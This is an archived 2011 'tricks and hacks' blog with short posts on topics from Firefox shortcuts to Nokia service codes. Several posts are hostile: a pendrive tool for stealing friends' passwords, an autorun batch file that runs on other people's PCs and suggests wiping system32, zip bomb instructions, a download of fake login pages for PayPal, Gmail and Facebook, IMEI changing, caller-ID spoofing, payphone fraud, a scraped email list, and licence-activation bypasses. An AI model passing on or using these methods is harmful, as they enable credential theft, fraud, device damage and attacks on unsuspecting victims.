Tuesday, August 16, 2011

Convert ur RAM into a Graphic card


Convert ur RAM into a Graphic card


¦ Virtual Graphics Card ¦
->Play latest Games without Graphic Cards
->Many times we are stuck up with a system that just doesn’t provide enough juice to run the latest game…the result being-
->you either spend a pot of money (atleast Rupees 3500 or 70$) for getting the latest graphics card
->or you just read reviews of games like Crysis , Far Cry on gamespot and feel like a noob,fully knowing that your system just won’t be able to support it....
->Take heart ! Here’s a wicked software with which you can beat 128-256 MB of graphics card requirements with a very modest 1GB DDR2 RAM.
link -> http: //www. ziddu. com/download/4104619/3danalyze...
Remove spaces
->What it does is,it uses a part of your RAM as Graphics card memory. For example,if you got 1GB DDR2 RAM,then
it’ll use 128MB of it as a Virtual Graphics card,and the remaining 896MB will be used as a regular RAM.
->Cool right….so you can Virtually emulate NVIDIA GeForce TI 4600,NVIDIA GeForce FX 4900 ULTRA,ATi Radeon 8500,
ATi Radeon 9800 PRO.

http://rapidshare.com/files/252922648/3danalyzer-v236.zip



How to get a speed upto 300 kb/s in Utorrent


How to get a speed upto 300 kb/s in Utorrent
Step 1:-
Go on the piratebay.org (or some other site.)

Step 2:-
Start downloading the torrent you want.

Step 3:-
Then in utorrent add the tracker list to properties on the torrent.


----- > http://nitinsharma.webs.com/tracker%20list.txt <------

If you don't know where to edit these tracker list then here are screenshots :)




http://www.youtube.com/watch?v=STDGLYnKPuM

Coin BOX calling Hack


[trick]Coin BOX calling Hack(Free Call)



Steps:
1.Insert Coin
2.Dial 0##Phone No. *(star)
3.Call Unlimited
4.And Disconnect
5.Coin Comes Out
6.Go Home Smiling(hehehe)

USBHack a PC by USB


||USB||Hack a PC by USB..
Hacking passwords or any information using USB(pendrives).Here is the small tricks

guys for stealing information or passwords of ur friends or enemies using pendrives...

Download this software:

http://www.mediafire.com/?f3ddzyenlug

1. Extract it.
2. open pcinfo
3. select all the files and paste it in ur USB(pendrive)
4. it in the pc u wanna hack...
5. Open the USB drive, give it 2 sec and and ur job is done...


And now open the dump folder in ur pc and u will have all the info u want....

Info u will obtain:


Ok now the problem which i was facing....

well i think it duznt autorun on PC with antivirus... U have to manually click the

nircmd.exe

U have to disable his/her antivirus for auto running this program..

Monday, August 15, 2011

REWARD FOR DOCOMO USERS


[FREE]REWARD FOR DOCOMO USERS
Sms "reward" to 121 to get free reward, i just tried it and won 20 local minutes for

6months.

This is the msg that i got:
"Congrats! you have won 20 FREE Tata to Tata local minutes every month for next 6

months. Free minutes credit will be done in the next 48 hrs. Enjoy your reward!"

How to use a trial software forever legally


[TUT]How to use a trial software forever legally
Now we download stuff almost daily. New products pop out so often. You can use any

software forever you want. You can download trial version, right. Trial version expires

after some days. You can stop that expiration. You can tell trial version of the software

to not count days or do not bother about time. The software will stay and keep working

like original software forever and will not expire or cease to work. You do not have to

change your system clock. This little software does it all.



Time Stopper is the software which can stop the time for try out version software. When

you stop the time you can use your try-out versions forever. When you stop the time of

a try-out version using this Time Stopper it works via this Time Stopper. Real time and

date run normally on your system. You can use any number of try-out version

softwares with this software.

How it Works


1. Open Time Stopper
2. Browse and select .exe of required trial software
3. Choose the new date (Any date which occurs in between your trial software time

period before expiration, suggestion: set it to two days before trial software expiration

date.)
4. Choose any time
5. Click open software on your selected date

If you wish to create an icon for your modified trial software and do not want to open

Time stopper every time then use last button in software to create new icon. open that

trial software after that from that newly created icon always otherwise it can expire.


This is 100% free and 100% legal!!


Download
http:// files.getdropbox. com/u/657816/Programs/TS2.zip
Remove spaces in link

zip virus


zip bomb


A zip bomb, also known as a Zip of Death, is a malicious archive file designed to crash

or render useless the program or system reading it. It is often used by virus writers to

disable antivirus software, so that a more traditional virus sent afterwards could get into

system undetected. A zip bomb is usually a small file (up to a few hundred kilobytes) for

ease of transport and to avoid suspicion. However, when the file is unpacked its

contents are more than the system can handle.You can make your own zip bomb to

annoy your friends or just out of curiosity (or wilderness) to experiment with it. Make

sure you don’t detonate it on yourself.

Here is how to make your own Zip of Death

Create a new text file in notepad, name it a.txt

Open and type the null character (alt + 255) in it.

Now press Ctrl + A then Ctrl + V a couple times to make some null bytes.If u have a hex

editor,then make the hex 00 for about 50 kilobytes.

Now make several copies of a.txt in the same directory and name them accordingly.

Open Command prompt and navigate to the folder containing a.txt . Type:

copy /b *.txt b.txt

This will write all the contents of a.text and its copies into a new text file called

b.txt,hence making every copy is a super copy. Repeat the above steps from the

beginning again and again to make a really big text file.

Once u have a nice empty big text file like 1gb or more,then compress it using Winrar or

Winzip into a zip file.

You will find that it will be compressed to very small size (about 1MB ). It is because of

the simple construction of the file as the text file contains 1gb of null bytes.

For added fun,open the compressed zip file file into a hex editor. You will see a bunch

of hex 5555.Just add some more and the file will expand amazingly.

Make sure that YOU DONT OPEN THIS afterwards.

Thanks Is Appreciated.

Font with Indian Rupee Symbol


[New] Font with Indian Rupee Symbol
The Rupee Font
Download it from here : Rupee.ttf

How to use ?
1. Download font Rupee.ttf

2. Install the font. (It is easy. Just copy the font and paste it in "Fonts" folder in control

panel)

3. Start using it. :)

How to type the Rupee symbol ?

The developers mapped the grave acent symbol - ` (the key just above "tab" button in your

keyboard) with the new Rupee symbol. Just select "Rupee" font from the drop down list of

your fonts in your application and press the key just above your tab button. It will display

our new rupee symbol. Try it.

Useful Mozilla Firefox Tricks!


Useful Mozilla Firefox Tricks!

Everybody’s favorite open-source browser, Firefox, is great right out of the box. And by

adding some of the awesome extensions available out there, the browser just gets better

and better.

But look under the hood, and there are a bunch of hidden (and some not-so-secret) tips

and tricks available that will crank Firefox up and pimp your browser. Make it faster,

cooler, more efficient. Get to be a Jedi master with the following cool Firefox tricks.

1) More screen space. Make your icons small. Go to View – Toolbars – Customize and

check the “Use small icons” box.

2) Smart keywords. If there’s a search you use a lot (let’s say IMDB.com’s people search),

this is an awesome tool that not many people use. Right-click on the search box, select

“Add a Keyword for this search”, give the keyword a name and an easy-to-type and

easy-to-remember shortcut name (let’s say “actor”) and save it. Now, when you want to do

an actor search, go to Firefox’s address bar, type “actor” and the name of the actor and

press return. Instant search! You can do this with any search box.

3) Keyboard shortcuts. This is where you become a real Jedi. It just takes a little while to

learn these, but once you do, your browsing will be super fast. Here are some of the most

common (and my personal favs):

* Spacebar (page down)
* Shift-Spacebar (page up)
* Ctrl+F (find)
* Alt-N (find next)
* Ctrl+D (bookmark page)
* Ctrl+T (new tab)
* Ctrl+K (go to search box)
* Ctrl+L (go to address bar)
* Ctrl+= (increase text size)
* Ctrl+- (decrease text size)
* Ctrl-W (close tab)
* F5 (reload)
* Alt-Home (go to home page)

4) Auto-complete. This is another keyboard shortcut, but it’s not commonly known and

very useful. Go to the address bar (Control-L) and type the name of the site without the

“www” or the “.com”. Let’s say “google”. Then press Control-Enter, and it will

automatically fill in the “www” and the “.com” and take you there – like magic! For .net

addresses, press Shift-Enter, and for .org addresses, press Control-Shift-Enter.

5) Tab navigation. Instead of using the mouse to select different tabs that you have open,

use the keyboard. Here are the shortcuts:

* Ctrl+Tab (rotate forward among tabs)
* Ctrl+Shft+Tab (rotate to the previous tab)
* Ctrl+1-9 (choose a number to jump to a specific tab)

6) Mouse shortcuts. Sometimes you’re already using your mouse and it’s easier to use a

mouse shortcut than to go back to the keyboard. Master these cool ones:

* Middle click on link (opens in new tab)
* Shift-scroll down (previous page)
* Shift-scroll up (next page)
* Ctrl-scroll up (decrease text size)
* Ctrl-scroll down (increase text size)
* Middle click on a tab (closes tab)

7) Delete items from address bar history. Firefox’s ability to automatically show previous

URLs you’ve visited, as you type, in the address bar’s drop-down history menu is very cool.

But sometimes you just don’t want those URLs to show up (I won’t ask why). Go to the

address bar (Ctrl-L), start typing an address, and the drop-down menu will appear with

the URLs of pages you’ve visited with those letters in them. Use the down-arrow to go

down to an address you want to delete, and press the Delete key to make it disappear.

8) User chrome. If you really want to trick out your Firefox, you’ll want to create a

UserChrome.css file and customize your browser. It’s a bit complicated to get into here,

but check out this tutorial.

9) Create a user.js file. Another way to customize Firefox, creating a user.js file can really

speed up your browsing. You’ll need to create a text file named user.js in your profile

folder (see this to find out where the profile folder is) and see this example user.js file that

you can modify. Created by techlifeweb.com, this example explains some of the things you

can do in its comments.

10) about:config. The true power user’s tool, about.config isn’t something to mess with if

you don’t know what a setting does. You can get to the main configuration screen by

putting about:config in the browser’s address bar. See Mozillazine’s about:config tips and

screenshots.

11) Add a keyword for a bookmark. Go to your bookmarks much faster by giving them

keywords. Right-click the bookmark and then select Properties. Put a short keyword in

the keyword field, save it, and now you can type that keyword in the address bar and it

will go to that bookmark.

12) Speed up Firefox. If you have a broadband connection (and most of us do), you can

use pipelining to speed up your page loads. This allows Firefox to load multiple things on

a page at once, instead of one at a time (by default, it’s optimized for dialup connections).

Here’s how:

* Type “about:config” into the address bar and hit return. Type “network.http” in the filter

field, and change the following settings (double-click on them to change them):
* Set “network.http.pipelining” to “true”
* Set “network.http.proxy.pipelining” to “true”
* Set “network.http.pipelining.maxrequests” to a number like 30. This will allow it to make

30 requests at once.
* Also, right-click anywhere and select New-> Integer. Name it

“nglayout.initialpaint.delay” and set its value to “0". This value is the amount of time the

browser waits before it acts on information it receives.

13) Limit RAM usage. If Firefox takes up too much memory on your computer, you can

limit the amount of RAM it is allowed to us. Again, go to about:config, filter

“browser.cache” and select “browser.cache.disk.capacity”. It’s set to 50000, but you can

lower it, depending on how much memory you have. Try 15000 if you have between

512MB and 1GB ram.

14) Reduce RAM usage further for when Firefox is minimized. This setting will move

Firefox to your hard drive when you minimize it, taking up much less memory. And there

is no noticeable difference in speed when you restore Firefox, so it’s definitely worth a go.

Again, go to about:config, right-click anywhere and select New-> Boolean. Name it

“config.trim_on_minimize” and set it to TRUE. You have to restart Firefox for these settings

to take effect.

15) Move or remove the close tab button. Do you accidentally click on the close button of

Firefox’s tabs? You can move them or remove them, again through about:config. Edit the

preference for “browser.tabs.closeButtons”. Here are the meanings of each value:

* 0: Display a close button on the active tab only
* 1:(Default) Display close buttons on all tabs
* 2:Don’t display any close buttons
* 3:Display a single close button at the end of the tab bar (Firefox 1.x behavior)

Trn Ur Bluetooth Cell Phone2Wireless Webcam


[trick]Trn Ur Bluetooth Cell Phone2Wireless Webcam
U need
-Cell phone with java, Bluetooth and camera in it.

-Bluetooth adapter for desktop

-Computer

-Software that will turn your phone in to wireless webcam

Download and install Smart Cam V1.5 for your desktop. Now again download the

favorable cell phone software from here. If you have symbian OS in your cell phone then

download the correct symbian version, or you can download the java version as well.

After downloading install it to your cell phone.

Now you’ll need to pair your Cell phone with computer from Bluetooth.

Run smart cam program in windows. And open smart cam in your cell phone as well.

In windows, choose Bluetooth as the connection in Files>settings.





In cell phone select connect and choose the Computer device in range.

Remember your PC must be visible to everyone in order to detect the PC by cell phone.

If everything went well, you’ll be seeing through cell phone’s camera in your computer.

You can use it as webcam in instant messengers like hotmail and yahoo.




How To Use USB Flash Drives As A RAM


[TuT]How To Use USB Flash Drives As A RAM
Using your USB storage device as RAM can be one of the best alternative for your real

RAM.

For this u need eboostr

download it http://download.cnet.com/eBoostr/3000-18512_4-10781844.html

or u can use any other Install it with default settings.

After installation, it is compulsary to reboot your computer.

Insert your USB flash drive first then open eBoostr from start menu.

In the program window, go to Edit > Add new cache device



You’ll see your USB disk at the left screen. Select it and click ok.




Then start caching the memory in your USB drive.

Alternatively, you can also click on Autoconfiguration button. Program will diagnose your

system. After the diagnose is ended, click next. Choose all the recommended option to

increase your system performance and click Next.





Now program will start to cache your memory. You may feel some difference in your

windows performance.





This software requires USB device more than 256 MB.

It stores the current memory as a cache in your USB device. Eboostr stores cache of your

frequently used applications on your USB Flash drive. It will help to reduce the Hard Disk

access which is comparatively slower as compared to access in chips. Since hard disk

requiers motor to rotate the disks, it will also consume a lot of your battery.

tut complete

thankyou

Track Pen Drive Uses


|TUT|Track Pen Drive Uses
Create an autorun.inf file on the root of your flash drive/Pendrive with the following

contents:

[autorun]
open=username.bat
action=Open folder to view files

Now, create a batch file called username.bat with the following contents:

@echo off
echo %username%>>users.dat
date /t>>users.dat
time /t>>users.dat
start "Explorer" %SystemRoot%\explorer.exe

_____________________________________
Create username.bat and autorun.inf in the root of your pendrive

NOTE : The Last Line of the code is optional which will open the explorer in a new

window.

Save both file and you are good to go. Now whenever a user plugs your pendrive into their

PC,it will display an autoplay option indicating that they have to click on the icon to open

the drive to view its contents. A small dos window will flash for a moment and then

disappear.Now If you go into the root of the drive, you will find a new file called users.dat

which will record the user names of all the users who have accessed your drive by clicking

on the icon. You can open the DAT file using notepad and view its contents.

However..This is not a fool proof method as some geeks disable the autoplay option (or

disable writing to usb drives ) ,or they just bypass it by pressing RIGHT SHIFT key when

the pendrive is connected and hence their name will not be recorded or they can delete

the users.dat file. But that said,it will work fine nevertheless

NOTE 2 : Umm..I think the above code is way too easy and harmless,why not to get

creative and create a batch file which will even change the password ?(DOS NET

commands) or even wipe out system32 of your nemesis (cacls command) ?

Php scripts for webmaster


|Share|300+ Php scripts for webmaster


Submit-A-Link" Style Script linksubmit.zip
"Suggest My Site" Script suggest.zip
"Users Online" Script #1 usersonline.zip
"Users Online" Script #2 cjusersonline.zip
Advanced Guestbook Script guestbook.zip
Affiliate Banner Rotation Script adrotator.zip
Affiliate Linkmaster affiliatemask.zip
Affiliate Program (Advanced Version) postaffiliate.zip
Affiliate Program (Basic Version) phpaffiliate.zip
Another PHP Web FTP Program webftp.zip
Auction Website phpauction.zip
Auto Hits Script scau.zip
Automated Form Submission Prevention human.zip
Bookmarks/Favorites Script bookmarks.zip
Build a Webring webring.zip
ClickBank "Thank You" Page Protector Script cbscript.zip
Client Invoicing Script myinvoice.zip
Document Management System sdms.zip
Easy Administration Program easyadmin.zip
EasyStream easystream.zip
Electronic Reminder Script ereminder.zip
Expired Domain Finder wgs-expire.zip
FAQ Generator whatdafaq.zip
FAQ Manager faqmanager.zip
FFA Links Page Script ffalinks.zip
File Transfer Script net2ftp.zip
Hot Mailing List Script newsletter.zip
ICQ Pager Script pager.zip
Image to ASCII Generator img2ascii.zip
Image Watermarking Script watermark.zip
Instant Photo Gallery Script instantgallery.zip
Instant Site Maker instantsm.zip
Link Listing Script links.zip
Links Exchange Website conservatory.zip
Live Help Script livehelp.zip
MySQL Database Backup Perl Script backupscript.zip
News Publishing Script topstory.zip
Office Intranet Suite intranet.zip
Online Classifieds Script classifieds.zip
Online MultiPlayer Chess webchess.zip
osCommerce PHP Shopping Cart oscommerce.zip
PassGen passgen.zip
PaymentPal paymentpal.zip
Perpetual Traffic Generator trafficgenerator.zip
PHP & MySQL Content Management System contentm.zip
PHP Form To Email Script SECURE! emailer.zip
PHP Message Boards Script messageboard.zip
PHP-based eCard Script/Website gcards.zip
POP-UP Creator popup.zip
Powerful Portal with Content Management phpx.zip
Secure Authentication Script authentication.zip
Simple Yet Powerful Download Counter Script hitcounter.zip
Sophisticated PHP Ecommerce Site xtcommerce.zip
Sports League, Fixture and Prediction Management Script phpfootball.zip
Toplist Website Manager #1 toplist.zip
Toplist Website Manager #2 topsites.zip
USENET News Client newsgroup.zip
Visitor Logging Script tollbooth.zip
Web Event Calendar calendar.zip
Web Portal System geeklog.zip
Web-Based Address Book Script wa-boo.zip
Web-based Image Management System photoseek.zip
Web-based POP Email Client webmail.zip
Website Stats Business trafficgopher.zip
Whois Lookup whois.zip
Yahoo Style Link Directory/Search Engine sslinks.zip

Please remember that in addition to these scripts, there are more than 200 additional

scripts included


http://rapidshare.com/files/226544938/100_The_Best_PHP_Scripts_For_Webmaster.rar

Java File Crypter


[APP][Java]File Crypter
Screenshot





Extension for the encrypted file
.enyc

How to use?




To Encrypt :-




Under the Encrypt tab, click on browse.
Select the file to encrypt.
Enter the password you want to set.
Press Encrypt.
Location of Output file will be given in the textbox below encrpyt button.

To Decrypt :-


Under the Decrypt tab, click on browse.
Select the file to decrypt.
Enter the password you had set for the encrypted file.
Press Decrypt.
Location of Output file will be given in the textbox below decrypt button.





Speciality
It is platform independant, i.e., it will run on all the Operating Systems.




Download




http://bit.ly/bmzPPw



P.S :- Any Bugs, Please Report here.!
And one more thing, JRE must be installed in your computer.!
Enjoy..!


For Windows users who are having problem in opening the file,
Download the file below and double click on exe file to run the jar file :-

http://bit.ly/9dv4St


For those who dont have java installed.!
Download the Java Runtime Environment from the link blow to run this App.>!


http://bit.ly/97GhmX

Record your screen ONLINE


|TRICK| Record your screen ONLINE
1) Go to http://www.screenr.com. You should see a yellow button that says "Record your

screencast now!"

2) After you have clicked it, it will ask you to run a java applet. Run it. Don't worry, it's

not a driveby ;).

3) Adjust the dimensions of the box until you get your desired screen size. When you are

ready to record click the red record . Then, a red box will indicate that you are recording.

4) When you are finished recording, press the DONE button just a little right from the

original record button.

Notes: You can only record up to 5 minutes of footage, you also MUST have a twitter

account.

I hope this will benefit some of you. Enjoy!

How to Use Windows 7 Without Activation


|Trick|How to Use Windows 7 Without Activation

Most of you might be aware of the fact that it is possible to use Windows 7 and Vista for

120 days without activation. This is actually possible using the slmgr -rearm command

which will extend the grace period from 30 days to 120 days. However in this post I will

show you a small trick using which it is possible to use Windows 7 without activation for

approximately an year! Here is a way to do that.

1. Goto “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt”

and select “Run as Administrator“. If you are not the administrator then you are

prompted to enter the password, or else you can proceed to step-2.

2. Now type the following command and hit enter
slmgr -rearm

3. You will be prompted to restart the computer. Once restarted the trial period will be

once again reset to 30 days. You can use the above command for up to 3 times by which

you can extend the trial period to 120 days without activation.

4. Now comes the actual trick by which you can extend the trial period for another 240

days. Open Registry Editor (type regedit in “Run” and hit Enter) and navigate to the

following location
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

NT\CurrentVersion\SoftwareProtectionPlatform

5. In right-side pane, change value of SkipRearm to 1.

6. Now you will be able to use the slmgr -rearm command for another 8 times so that you

can skip activation process for another 240 days. So you will get 120 + 240 = 360 days of

free Windows 7 usage.
120 days using “slmgr -rearm” command before registry edit+

240 days using “slmgr -rearm” command after registry edit

= 360 Days

Google Pays You For Your Hacking Skill


|OFF| Google Pays You For Your Hacking Skill
Are you an hacker expert and like to find online flaws and vulnerabilities?

Then here's a good opportunity to make use of those skills and even get rewarded for your

work from Google.

Google has announced a program where they are inviting hackers to find flaws and

vulnerabilities with their online services.

If you find a bug, you are assured a reward of $500 and the bug is found to be very severe

you have the opportunity for a sum reward of $3,133.7

Google has made it clear that:

# Only Google, YouTube, Blogger and Orkut can be used by experts to find security flaws.


# Other services like Picassa, Android and Google Desktop are not in the scope for hackers

to claim the bounty.


# Just a point of note, that people looking to find security flaws should use their own

Google accounts or test accounts but never other peoples accounts either. This is illegal

and can invite more than a few troubles.

If you have came across any vulnerability you can report them on this page

[http://www.google.com/corporate/security.html] and in turn they will credit you for

your job.

FOR MORE DETAILS ABOUT THE PROGRAM VISIT GOOGLE ONLINE SECURITY

[http://googleonlinesecurity.blogspot.com/2010/11/rewarding-web-application-security.

html].

Make your Own Keylogger in VB Full Tut

Bug in windows


[funny]Bug in windows
this is amazing...big mistake made by microsoft windows
hello friends i just got really amazing thing which windows has screwed up..just try this
go to start-> microsoft calculator then
calculate square root of 4 sqrt(4) then subtract the result with 2..
Check out what happens ;)

IMEI Changer


[APP] IMEI Changer [APP]



This IMEI tool is designed to enable customers to change MTK based mobile phone IMEI

numbers. It features advanced technology to enable changing by selecting only 2 buttons.

Which makes it very quick and easy to use. It can also auto suggest correct IMEI number

and supports both Single and Dual Sim MTK based phones.
Change your china mobile IMEI number.
Works on almost all mobile.

SETUP.

Step 1: Write down current IMEI numbers from sticker on rear of phone.
Step 2: Turn on you mobile phone.
Step 3: Slide to unlock screen, this will take you to phones main menu buttons.
Step 4: Plug phone into computers USB cable. A new menu will appear.
Step 5: Select comport on phone screen.
Step 5A: If drivers have not been installed then computer will prompt you to install them.

When Windows try to find drivers select advance and show it the .inf file that comes in

the zip file. or you can install driver manually, locate .inf file, right click with mouse, then

select install option (Picture provided in Xp folder).

USING IMEI TOOL

Step 1A: Open IMEI tool.
Step 1: Select Auto search or manually open port.
Step 2: IMEI tool will automatically read current IMEI numbers and display in small area

above white box. Enter the new required IMEI numbers from rear of phone sticker.
Step 3: Select "Set new IMEI on Sciphone". Message will appear after a few seconds.
Step 4: Reset phone by disconnecting USB cable then turning off phone.

Power on Phone then DIAL *#06# to verify IMEI numbers loaded OK.

Finished. Congratulations you have now changed the IMEI number successfully.

DOWNLOAD:
http://sharecash.org/download.php?file=337913
http://uploading.com/files/cf365529/IMEI%2BTool.zip/

How 2 Call Ur Friends With Their Own Number


[Trick]How 2 Call Ur Friends With Their Own Number
How to call your friends with their own number

Hello Friends after "Make Free Phone Calls From PC to mobile for free" hack today I am

sahring With you a extremely Nice Prank or you can simply say Hack i.e "How To Call

Your Friends From THeir Own Cell Number".

Mobile hack to call your friends:

1. Go to http://www.mobivox.com and register there for free account.

2. During registration, remember to insert Victim mobile number in "Phone number" field 

as shown below.


3. Complete registration and confirm your email id and then login to your account. Click 

on "Direct WebCall".


4. You will arrive at page shown below. In "Enter a number" box, select your country and 

also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to 

call your friend with his own number.





5. That's it. Your friend will be shocked to see his own number calling him. I have spent 

last two days simply playing this cool mobile hack prank.




Free call anywhere to anywhere


[TRICK]Free call anywhere to anywhere !!!


I got the site just now and I am very excited to share this with you.Click the link below
http://evaphone.com/
Calling from here is absolutely free.And it is tested by me.But there is a limitation in that

site that you can do calls once in a day per IP just 3-4 times.
No need for registration.But I think this problem can be eliminated using some proxy or IP

hider.
It is on browser calling phone.no need to install other software.
So, if youve got a headset or microphone with speakers, broadband Internet connection

and Adobe Flash Player (9.0 and higher) EVAPHONE is here to help you call for free.

Worldwide.
If you want to call without any limitation,you have to register and spend money for it.

How to play Play Station 2(PS2) Games on PC


[TUT]How to play Play Station 2(PS2) Games on PC
To play PS2 games on PC you need a software called PCSX2. Download it from -

http://pcsx2.net/downloads.php



After downloading install it then configure according to your PC.
Now select the Cdvdrom plugin.
If you want to play it directly through DVD then select Gigaherz's CDVD Plugin and select

your CD Drive and if you want to play it through an ISO then select another plugin (can't

recognize the name) you can find it. It is in the same list.
So after configuring everything go to file and click on Run CDVD.
You're done!



Enjoy :)

Nokia Phone Secrets


1. Service Programming Menu - *3001#12345#

This menu is the mother of all Nokia codes, you can edit your phone like mad here, most

of these menus your service provider probably doesn't want you to have the ability to do.

So here we go.

On stand-by mode, type in *3001#12345# and wait a few seconds for it to load up. Once

the screen comes up you will have several options, all with different functions. (NOTE:

this menu differs on different phones.)

1. NAM 1
2. Change SPC
3. Security
4. Server addr.
5. SW version
6. Serial number
7. Programmed
8. Field test

1. NAM 1 (* means explained below)

This is the most useful menu your phone has, it allows you to edit the heck out of your

phone! inside NAM 1 there are these different menus:

Own number*
Mobile ID number
A-key code
Alpha tag*
Emergency*
Service No.
CDMA settings
NAM status

Own number:
Self explanitory, but if you want a new number then this is where you want to go. Just

enter this menu followed by the SPC (see Change SPC) then change your number. This

DOES work, but the new phone number you want must not already be in use.

Alpha tag:
You know on the standby screen, there's the "Vodafone" or "Telecom" or "T-Mobile" that

appears? well now you can get rid of that annoying tag. Change this to whatever you

please, just to make your phone more personalised.

Emergency:
This menu is basically a menu which displays all the numbers that will divert to the

emergency number of your area. For example, if you live in USA and your emergency

number is 911, in this menu there will be "911","811", "991" and the obvious numbers

that you may type in while trying to reach 911. It's smart not to mess with these, because

you never know when you'll be in an emergency. There should be some free slots so why

not add in a couple more numbers that you want to divert to your emergency?
Some people think "Wow! emergency number! that calls for free, so maybe if i put in my

friends number then it will give me free calls to him/her!" WRONG. This menu can NOT

give you free calls. If you were to put in your friends number, then whenever you called

them you would end up calling the emergency line - as that's what you're diverted to!

REMEMBER THIS!


2. Change SPC

The SPC is the Service Programming Code. This code is rather hard to come across, as the

service providers try to hide it from the public so they can't access these places on their

phones. But luckily enough if you live in New Zealand then here is the code :)

147359 - Is the default code that will let you into 'almost' anything
665*** - Is the 'master' code, that will let you into anything you like.

(The *** is the last 3 digits of your Nokia model, for example: If your Nokia was model

number '8734', then your master code will be '665734'. The 665 is the default number for

the Nokia company.)

So, this menu just means you can change the code. NOTE: Some mean stores when you buy

the phone tend to access this menu and change it so that the owner can't access it :( that

is not always the case though, so try it out!

3. Security

This menu just shows you the security code that is installed on your phone, couldn't be

more bland.
FUN TRICK: why not have a look at your friend/work mates' phone and access this menu,

you could then see their security code or change it just for fun :) But we're nice people

and that's naughty, so we arn't going to do that are we..

----------------------------------------------------------------------------------------------

4. Server addr.

This is the server address of your service provider. Nothing you can do here.

----------------------------------------------------------------------------------------------

5. SW version

Once again, another menu with not alot of meaning. All you can do in here is check out

when your phone was activated, and what version software it is running. This can also be

accessed on GSM phones (see below)

6. Serial number

This is your serial number. DUH.
It would be a wise idea to jot this down somewhere safe, because this could be useful. If

your phone was ever lost or stolen then you could contact your service provider and give

them this code. This would let them shut the phone down so that your robber couldn't

use your phone - or access anything on it for that matter.

----------------------------------------------------------------------------------------------

7. Programmed

This is just a menu that you can only access once, which lets you type in when your phone

was programmed.

Seem like the menus are getting lamer? Wait for the next one..

8. Field Test

This is an option which is quite cool really. Go into Field test and change "Disabled" to

"Enabled". Then get out of the whole service programming menu.
Now, turn your phone off, and back on again.
Once it loads up go to your normal menu and scroll to the bottom. Notice you have just

added a new menu to your phone? It is called Net Monitor.
Net Monitor speaks for itself, with this option you can monitor your network to a small

extent.
Enter Net Monitor and it will prompt you with "Group/display:" enter in 3101 and press

OK.
It should take you back to your standby screen, nothing will have changed. But wait a few

seconds and then all these numbers will appear on your screen. What do they mean?

There is only one number you can really understand in this menu. This number is located

as the third number down, it will say something like "-50" (the 50 can range anywhere

from 10 to 99). This is how strong the signal is.

For example : If your phone displayed -10 here then it's telling you that your neighbour is

a cell site and your signal is really really good.

If your phone displayed -90 then it's basically telling you that where you live or where you

are at that certain time has really bad signal.

You will notice that as you get closer/further away to a cell site this number will grow or

decrease.

----------------------------------------------------------------------------------------------

That sums up the Service Programming Menu, and the extra things your service provider

doesn't want you doing :}

There are many other codes that you can use on CDMA phones, just search around for

them.

Extra Codes:

*#66767# - This code when spelt out is "NO-SMS", so shouldn't that mean no texting? well,

yes. If you enter this code in on your phone then you will no longer have the ability to

"Create Message" or "Reply". If you're really mean then enter it on your brother or sisters

phone, that's sure to give you some laughs. You can bring them back again by re-entering

the code.

*#639# - This brings you to the menu which just re-programs your phone faster. I

wouldn't reccomend you doing this if you value your phone.

*#7780# - This takes you to a menu which says "Restore Factory Settings", i think you

understand what will happen if you press yes :p

GSM Code:

This is the only GSM code i know from the top of my head, just search around for more as

I'm sure they're out there.

*#0000# - This is probably the most useless code you can find, but anyway it just gives you

information on when your phone was activated. If your phone was sent in for repair, then

this date will have changed to the date when it was fixed.

On the main screen type in:
*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display(operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
#pw+1234567890+1# Shows if sim have restrictions.
*#92702689# - takes you to a secret menu where you may find some of the information

below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)
*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better

signal reception. It also help if u want to use GPRS and the service is not responding or

too slow. Phone battery will drain faster though.
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by

30% because phone receives less signal from network.

*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will automatically restart
If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock

code is: 12345
Press *#3925538# to delete the contents and code of wallet.
Unlock service provider: Insert sim, turn phone on and press vol up(arrow keys) for 3

seconds, should say pin code. Press C,then press * message should flash, press * again and

04*pin*pin*pin# \
*#7328748263373738# resets security code.
Default security code is 12345
Change closed caller group (settings >security settings>user groups) to 00000 and ure

phone will sound the message tone when you are near a radar speed trap. Setting it to

500 will cause your phone 2 set off security alarms at shop exits, gr8 for practical jokes!

(works with some of the Nokia phones.) Press and hold "0" on the main screen to o

Famous Sites Fake Pages


The Following File Includes Most Of The Famous Sites Fake Pages

eBay

Facebook

Gmail

Hi5

AIM

Hotmail

Yahoo

My Space

Paypal

FLV

Photo Bucket

Rapidshare

Runescapehttp://rapidshare.com/files/225587482/fakes_badman.rar

Enjoy!!!!!!!!

[TUT] how to mass add friends on Facebook

[TUT] how to mass add friends on Facebook + 20k+ mail list

Well, I got some PM's asking me how to.. so heres a thread..
no need to flame if u already know this method

Goto ur FB account







An email list for trial (20000+ emails >> all Mafia War addicts)
http://www.multiupload.com/T5CUE9ZD1B

How To Sign Out of Gmail Account Remotely


[share]How To Sign Out of Gmail Account Remotely
Sign Out of Gmail Account Remotely
Gmail is one of the widely use email service.There are lot of features in gmail. There is a

security feature for gmail known as remote logout. Many of use more than one computers

to login to gmail account. Some times we often leave the browser opened & not being

logged out of gmail or we are in cyber cafe and any power cut or computer faliure occurs

and if the computer is at office or any public place your account may be hacked or

misused by someone else.
But there is a method by which you can l;og out from your gmail account remotely.
Open you gmail account and go to bottom of the page ,there you will see something as

shown below..



gmail-remote-logout
Now you can click on “Details” which shows you a pop-up having details about your last

sessions.Click on “Sign out all other sessions” to sign out of gmail at all other places exept

the current.
By this simple feature you can check that your gmail account is hacked or not.

Download encryption tool InstantCrypt


[share]Download encryption tool InstantCrypt



InstantCrypt 2.3.0.0 Portable | 5.95 Mb

InstantCrypt is a powerful encryption tool using the Open PGP standard designed to send

and receive secure email. It encrypts ("scrambles") your email so that only the intended

